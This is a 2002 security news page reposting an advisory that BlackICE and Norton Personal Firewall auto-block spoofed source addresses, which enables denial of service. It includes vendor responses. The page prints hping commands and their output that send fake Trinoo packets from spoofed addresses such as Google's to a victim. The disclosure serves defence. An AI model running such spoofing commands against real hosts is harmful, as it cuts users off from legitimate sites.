Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Multiple Vendor PC Firewall Remote Denial of Services Vulnerability |
|---|
Categorie: Vulnerability
Posted: 2002-10-13 by Gmtech
Views: 519
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Affected versions:
Yiming has tested the following products:
* BlackICE Defender for server version 2.9.cap
* BlackICE Server Protection version 3.5.cdf
* Norton personal firewall 2002 (version 4.0)
Below are the steps and result of the test on BlackICE, step 1:
A clean and DEFAULT installation of BlackICE defender for server (version 2.9.cap) on a Win2k server PC, which IP address is ip.add.of.victim
Step 2:
On a Linux box with hping installed, perform the following three commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing: send a fake Trinoo communication (UDP packet) to our target machine ip.add.of.victim with a spoofed IP address (Google, NetworkICE, and ip.add.of.dnsserver-our DNS server).
Result:
Each time the command is executed, the BlackICE icon on the Windows system tray will flash, and an entry is added in BlackICE's Advanced Firewall Settings automatically, which in turn will block all subsequent packets arriving from the spoofed address. This makes the address unreachable to the user, effectively creating a denial-of-service condition.
The test steps and result for Norton Personal Firewall are almost the same, using hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address instead of the one used in previous example.
Vendor response:
Yiming has contacted symsecurity@symantec.com and NSupport@iss.net on Sep 24, 2002, Symantec told him they have forwarded his concerns to the appropriate team, and BlackICE reply that its part of the product's functionality.
Symantec response:
Symantec was notified of a potential denial-of-service (DoS) issue with Symantec Norton Personal Firewall's AutoBlock feature. The discoverer, Yiming Gong, China Netcom, subsequently posted the findings to the BugTraq mailing list, prior to a coordinated response from Symantec. According to the discoverer, by directing an attack against a user of a personal firewall providing a form of auto blocking capability and by spoofing a valid IP address, an attacker could potentially create a DoS of that address when the AutoBlock feature blocks access to the IP address for a period of time. In this manner, a valid IP address could possibly be temporarily denied to the user of the personal firewall.
Symantec considers the AutoBlock feature of their personal firewall products to be a valuable part of any Internet security capability. While the scenario described in the referenced Bugtraq posting could cause a minor temporary DoS, a concerted attack of this type would, by its very nature be of limited scope. The default timeout for AutoBlock is 30 minutes so even if an IP address were to be blocked in this manner, it would be for a limited period.
Symantec's AutoBlock feature does provide an exclusion list so that should a user becomes aware of a spoofed DoS attack of this nature, they could place the valid IP address in the AutoBlock exclusion list to prevent the valid site from being blocked automatically. The attack packets from the spoofed IP address used in the DoS attempt would still be intercepted by the firewall, but the intended DoS by the attacker would be thwarted.
However, while Symantec considers a threat of this nature to be very low risk and highly limited in scope, we are continuously working to increase the security capability and posture of our products. Symantec is researching ways of building additional intelligent decision capability into our AutoBlock feature.
| | Links |
|---|
Multiple Firewalls Ruleset Bypass through FTP Revisited
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=53
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
